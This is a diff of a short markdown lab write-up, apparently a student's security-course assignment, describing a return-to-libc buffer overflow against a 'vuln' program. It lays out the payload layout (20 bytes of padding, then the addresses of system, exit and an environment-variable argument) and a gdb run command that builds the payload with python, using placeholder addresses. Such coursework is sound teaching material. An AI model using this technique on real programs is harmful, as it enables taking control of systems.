KITLoveWF/22110046_MaiDucKien/22110046_MaiDucKien.md

 If we want to exploit

-20 bytes to overwrite buf and ebp
+20 bytes to overwrite buf and ebp <br>
-4 bytes to overwrite ret addr of vuln with the address of system 4 bytes for the address of exit
+4 bytes to overwrite ret addr of vuln with the address of system <br>
+4 bytes for the address of exit <br>
-4 bytes for argument of system (exploit path that we created before)
+4 bytes for argument of system (exploit path that we created before) <br>

 ```
 r $(python -c "print(20*'a' + 'address of system' + 'address of exit' + 'address of env var')")